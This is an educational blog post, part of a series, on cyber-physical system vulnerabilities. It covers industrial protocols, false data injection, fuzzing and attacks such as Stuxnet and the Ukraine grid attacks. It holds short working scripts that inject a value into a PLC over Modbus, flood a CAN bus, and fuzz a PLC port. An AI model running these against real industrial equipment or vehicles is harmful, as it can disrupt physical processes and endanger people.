Introduction to Cyber Physical System Vulnerabilities


In Part 8 of this new Cyber Physical Systems series, I will introduce the different types of vulnerabilities that these systems have and why they are so vulnerable.


CPS Vulnerabilities

A vulnerability is a security gap that can be exploited. Hence, vulnerability assessments consist of identifying and analysing the CPS weaknesses that are present, while also identifying appropriate corrective and preventative actions to reduce, mitigate or even eliminate them.

Vulnerabilities arise for many reasons. Some of the important ones are:

  • Isolation assumption (aka "security by obscurity")

  • Increased connectivity

  • Heterogeneity

  • USB usage - how Stuxnet jumped the air gap and reached Iran's uranium enrichment facility

  • Bad practices - bad coding, weak skills, misconfiguration

  • Spying - long-term reconnaissance that goes unnoticed, used to steal and gather sensitive/confidential data and analyse system behaviours

  • Homogeneity - similar CPS types suffer from the same vulnerabilities, and once one is exploited, all similar devices can be affected

  • Malicious or disgruntled employees - sabotage, modifying code, granting unauthorized remote access, etc.

CPS vulnerabilities can be of different types: cyber, physical (and, when the two combine, cyber-physical), technical, network, platform and management.

Cyber Vulnerabilities

ICSs rely heavily on ICCP and TCP/IP for inter-control center communication. The Inter-control Center Communications Protocol (ICCP) was developed to enable data exchange over Wide Area Networks between utility control centers, Independent System Operators (ISOs), Regional Transmission Operators (RTOs) and other generators.

ICCP suffers from buffer overflow vulnerabilities and lacks built-in security measures, although secure variants (Secure ICCP, ICCP over TLS) exist. Stuxnet, DuQu, Gauss, Red October, Shamoon (which hit the Saudi Aramco oil company), Mahdi and Slammer (which spread by scanning the internet) are just some examples of malware that exploited such cyber weaknesses.

Open and non-secure wired/wireless communication channels (e.g. Ethernet) are vulnerable to interception, sniffing, eavesdropping, wiretapping, wardialing, wardriving, meet-in-the-middle attacks (which break sequential encryption schemes such as Double-DES) and SQL injection.
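
As a small aside on the meet-in-the-middle technique: the sketch below attacks a deliberately weak, made-up 8-bit toy cipher (not DES) encrypted twice with two independent keys. The idea carries over to Double-DES: by meeting in the middle of the two encryption stages, recovering both keys costs roughly 2 x 2^8 toy operations here instead of 2^16 (or 2 x 2^56 instead of 2^112 for Double-DES).

    # Toy cipher: 8-bit block, 8-bit key, invertible and deliberately weak.
    def toy_encrypt(block: int, key: int) -> int:
        return (((block ^ key) * 7) + key) % 256

    def toy_decrypt(block: int, key: int) -> int:
        return (((block - key) * 183) % 256) ^ key   # 183 = 7^-1 mod 256

    def double_encrypt(block: int, k1: int, k2: int) -> int:
        return toy_encrypt(toy_encrypt(block, k1), k2)

    # The attacker has one known plaintext/ciphertext pair.
    plain, k1_secret, k2_secret = 0x3C, 0xA7, 0x15
    cipher = double_encrypt(plain, k1_secret, k2_secret)

    # Encrypt forwards under every possible k1, decrypt backwards under every k2,
    # and look for a matching intermediate value ("meeting in the middle").
    forward = {toy_encrypt(plain, k1): k1 for k1 in range(256)}
    candidates = [(forward[mid], k2) for k2 in range(256)
                  if (mid := toy_decrypt(cipher, k2)) in forward]

    print((k1_secret, k2_secret) in candidates)   # True, among a few false positives

A second known plaintext/ciphertext pair is usually enough to weed out the handful of false-positive key pairs.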

Modbus and DNP3, which are used to monitor and send control commands to the perception layer, have no built-in security measures and are open to false data injection, battery-draining attacks and many other exploits. DNP3 at least includes a CRC, which provides some integrity checking.
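
To make the "no security measures" point concrete, here is a minimal sketch that hand-builds a Modbus/TCP write-single-register frame and sends it to a PLC over a plain socket; the IP address, register number and value are hypothetical, and this should only ever be pointed at lab equipment.

    import socket
    import struct

    PLC_IP = "192.168.1.10"   # hypothetical lab device; Modbus/TCP uses port 502
    REGISTER = 40             # hypothetical holding register address
    VALUE = 9999              # arbitrary value to inject

    # MBAP header (transaction id, protocol id = 0, remaining length, unit id)
    # followed by the PDU: function 0x06 (write single register), address, value.
    frame = struct.pack(">HHHBBHH", 1, 0, 6, 1, 0x06, REGISTER, VALUE)

    with socket.create_connection((PLC_IP, 502), timeout=3) as s:
        s.sendall(frame)      # no credentials, no session, no signing
        print("PLC echoed:", s.recv(1024).hex())

Nothing beyond network reachability is required by the protocol itself, which is why Modbus deployments lean so heavily on network segmentation.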

CAN (Controller Area Network) suffers from many vulnerabilities, leaving smart cars prone to attacks such as DoS.
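
A minimal sketch of such a DoS, assuming the python-can library and a Linux virtual CAN interface (vcan0) configured for testing: CAN frames carry no sender authentication, and arbitration ID 0x000 wins every arbitration round, so flooding the bus with it can starve legitimate ECU traffic.

    import can  # pip install python-can; assumes a vcan0 test interface exists

    bus = can.interface.Bus(channel="vcan0", bustype="socketcan")
    # ID 0x000 has the highest priority on the bus.
    frame = can.Message(arbitration_id=0x000, data=[0] * 8, is_extended_id=False)

    try:
        while True:
            bus.send(frame)      # flood the bus and starve legitimate ECUs
    except can.CanError as err:
        print("bus error:", err)
    finally:
        bus.shutdown()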

Physical Vulnerabilities

The physical category covers vulnerabilities caused by insufficient physical security around components: being open to tampering, alteration, modification or even sabotage.

The physical layer also includes medical devices, which are vulnerable to physical access and configuration tampering, putting patient health at risk.

The best way to address these vulnerabilities is a combination of detection (e.g. tamper detection) and prevention (e.g. physical access controls).

The remaining CPS vulnerability categories are:

Technical

These commonly occur due to a lack of human/personnel awareness and skills.

Platform

Vulnerabilities in configuration, hardware, software and lack of protection.

Management

These vulnerabilities are mainly due to the lack of security policies, standards and vulnerability management systems.


False Data Injection

A special class of attacks on control systems is false data injection (FDI). In these data-integrity attacks, sensor measurements or actuation commands are corrupted by a cyber attacker in order to cause physical impact.

False data injection targets actuators or sensors in feedback control systems and can cause significant physical damage.

Security mechanisms should therefore focus on the control system itself. This does not eliminate the need for traditional security technologies such as encryption or authentication; rather, control-level defences complement them when attacks cannot be mitigated at a lower layer.

Assuming that the system under attack is in equilibrium, the start of an attack will cause a perturbation (disturbance). Hence, it might be detectable to the operator. However, carefully crafted attacks can still mask themselves as a natural disturbance.

From an operator's point of view, breaking the equilibrium is considered an anomaly, and it becomes especially suspicious when the perturbation is large and sustained.

FDI targets sensors and actuators, which produce a physical and tangible impact, therefore compromising the stealthiness of the attacker. Stealthiness is measured by the scale and duration of the perturbation the attack causes.

Crafted attacks such as coordinated (coordinated sensor) attacks can minimize the perturbation and therefore keep the attacker stealthy.

In recent years, coordinated cyber-physical attacks have caused blackouts of the power grid and disrupted power systems. The main reason is that coordinated attacks on the power grid were not detected in time, so effective measures to prevent major accidents could not be implemented at the optimum moment.

Successful attacks on the information collected from sensors in a feedback control system can have more damaging consequences, compared to open-loop systems. This is due to the active property of closed-loop control systems, where the data collected from sensors are used to decide the next actions to be taken.
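
A minimal sketch of that closed-loop effect, using a made-up first-order tank-level model, a proportional controller and a constant sensor bias (all values hypothetical): the controller chases the falsified reading, so the reported level settles back at the setpoint while the true level ends up a full unit higher.

    SETPOINT = 5.0     # desired tank level (arbitrary units)
    KP = 0.5           # proportional gain of the controller
    BIAS = -1.0        # attacker subtracts 1.0 from every sensor reading

    level = 5.0
    for t in range(20):
        measured = level + (BIAS if t >= 5 else 0.0)   # attack starts at t = 5
        inflow = KP * (SETPOINT - measured)            # controller trusts the sensor
        level += inflow                                # crude first-order plant model
        print(f"t={t:2d}  reported={measured:5.2f}  true={level:5.2f}")

In an open-loop system the same bias would only distort the display; here it actively drives the physical process away from its safe operating point.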


Fuzzing

Fuzz testing (fuzzing) is an automated software testing method that injects invalid, malformed, or unexpected inputs into a system to reveal software defects and vulnerabilities. A fuzzing tool injects these inputs into the system and then monitors for exceptions such as crashes or information leakage.

Fuzzing is often used to test for vulnerabilities. However, it can also be used offensively to build attacks and exploits, for example by taking down ICS components.
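
A minimal sketch of what such a naive network fuzzer might look like against a Modbus/TCP service; the target address is hypothetical, and this kind of testing belongs on lab equipment, never on a live plant.

    import random
    import socket

    TARGET = ("192.168.1.10", 502)   # hypothetical lab device

    for attempt in range(1000):
        # Random length, random bytes: invalid MBAP headers, bogus function codes, etc.
        payload = bytes(random.randrange(256) for _ in range(random.randrange(1, 300)))
        try:
            with socket.create_connection(TARGET, timeout=2) as s:
                s.sendall(payload)
                s.recv(1024)
        except OSError as err:
            # A refusal or timeout after earlier successes may mean the service
            # crashed or hung on a previous malformed input - log and investigate.
            print(f"attempt {attempt}: {err!r}, last payload {payload[:16].hex()}...")

Real ICS fuzzers are protocol-aware - they mutate valid frames field by field rather than throwing pure noise - but the monitor-for-crashes loop is the same.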

There are many fuzzing tools; some of those relevant to ICS are:

  • beSTORM (not free)

  • Sulley - Not well maintained

  • SMOD (Python2 based) - old and abandoned

  • Modbus-cli (free C/C++ based)

Some other tools, such as Mu-8000 and Achilles, require dedicated hardware and software. Such hardware-based tools are often capable of fuzz testing beyond the network and protocols. For instance, they can test field equipment such as valves, actuators, PLCs and other controlling units.

Such solutions are not free or open source. For instance, Achilles has its own certification program in addition to fuzz testing hardware and software.


Covert/Stealthy Attacks

A fundamental problem in intrusion detection is the existence of adaptive adversaries that will attempt to evade the detection scheme; therefore, we now consider an adversary that knows about our anomaly detection scheme.

The goal of the attacker is to raise the pressure in the tank without being detected: raising the pressure while making the system appear to be working normally, or adjusting the reported values so they stay within accepted thresholds and go undetected.

Stale data injection attacks can also bypass detection systems because they replay plausible, expected data (they are similar to FDI).

Stealthy FDI attacks are divided into 3 groups:

  1. Surge attacks - modify the system to achieve maximum damage as soon as the attacker gains access. These attacks are not covert, as they cause a huge perturbation in the system.

  2. Bias attacks - modify the system discreetly by adding small perturbations that go undetected. These are prolonged attacks which, over time, can shorten the lifespan of components and inflict damage (Stuxnet).

  3. Geometric attacks - shift the behaviour of the system very discreetly at the beginning of the attack and then maximize the damage after the system has been moved to a more vulnerable state. In other words, the attack starts as a bias attack and then transforms into a surge attack when the system is at its most vulnerable, reducing the opportunity to neutralize it.
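
The sketch below renders these three shapes as injection signals added to a sensor reading over time; the step size, switch-over point and magnitudes are made up, only the shapes matter.

    def surge(t, magnitude=10.0):
        # Maximum damage immediately: a large, easily detected perturbation.
        return magnitude

    def bias(t, step=0.05):
        # A small drift added at every step, designed to stay under detection thresholds.
        return step * t

    def geometric(t, step=0.05, switch=100, magnitude=10.0):
        # Drift like a bias attack, then surge once the system has been weakened.
        return step * t if t < switch else magnitude

    for t in (0, 50, 100, 150):
        print(t, surge(t), round(bias(t), 2), geometric(t))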


Case Studies

Stuxnet, the first known computer worm designed to harm a physical process, sabotaged centrifuges at a uranium enrichment plant in Iran. The attack deceived the operators, making them believe that the process was operating normally while at the same time sabotaging the enrichment of uranium.

Stuxnet was uncovered in 2010. Four years later, a similar attack disrupted the control system of a German steel mill by preventing a blast furnace from shutting down properly, causing massive damage.

Stuxnet initially spread into the targeted facilities via USB flash drives. It does little harm to computers and networks that do not meet specific configuration requirements and stays inert - it only activates if it senses Siemens software indicating the presence of PLCs and an ICS environment.

Even then, it did not target all ICSs; it was specifically crafted to harm very particular ICS motors.

The entirety of the Stuxnet code has not yet been disclosed, but its payload targets only those SCADA configurations that meet criteria that it is programmed to identify. Stuxnet monitored the ICS to find motors in the system (motors used in the centrifuges).

It monitors the rotational speed of the motors to confirm it is inside the intended enrichment plant. If all of these conditions are met, it installs malware on the PLC that occasionally manipulates the rotational speed, boosting it from roughly 1,000 Hz to about 1,400 Hz for about 15 minutes.

Then it slows the motors down to 2 Hz for about 50 minutes. These speeds are fatal for the rotating parts of the centrifuges, which make contact and wear out quickly. This small change was enough to, over time, slow down enrichment by around 30%, strain the centrifuges and damage about 1,000 of them.

In 2015, the first confirmed attack on a power grid was launched on the electricity system of Ukraine. It resulted in power outages for 1-6 hours. The attack took place during the ongoing Russo-Ukrainian War (2014-present) and is attributed to a Russian APT known as "Sandworm".

Attackers used the operator's workstations to open breakers and interrupt the power flow of around 60 substations. They also overwrote the firmware of control devices, leaving them unresponsive to remote commands.

On top of that, the attack was designed to delay incident reporting and to impede the operators' remote actions.

Later, in 2016, another attack was launched that took a somewhat similar approach to Stuxnet, with a more sophisticated strategy aimed mainly at ICSs.

The Ukraine case is very complicated and involves several kinds of vulnerability (physical, cyber, management, political, etc.):

  • Old and dilapidated infrastructure

  • High level of corruption

  • Ongoing geopolitical conflict

  • Possible Russian infiltration

  • Ukraine power grid built by Soviet Union and upgraded with Russian parts

  • Attackers' knowledge of the software and infrastructure

  • Timing of the attack (during holidays) hence a lack of crew and operators

The attack in the Ukraine case study unfolded roughly as follows:

  • Spear-phishing emails with BlackEnergy malware compromised the network

  • Seizing control of SCADA and remotely switching substations off

  • Disabling/destroying IT/OT infrastructure components (UPSs, modems, RTUs, commutators)

  • Destruction of files stored on servers and workstations with the KillDisk malware

  • DoS attack on the call center to stop consumers from getting up-to-date information on the blackout

  • Switching off emergency power at the utility company's operation center

Finally, the Triton malware was discovered in 2017 at a Saudi Arabian petrochemical plant. FireEye assessed that it was likely crafted by the Russian institute CNIIHM. The malware disabled the plant's safety instruments and systems, which could have caused a disaster; hence it has been called the "world's most murderous malware".

Previous: Introduction to Securing Cyber Physical Systems

Next: Introduction to Attacks on Cyber Physical Systems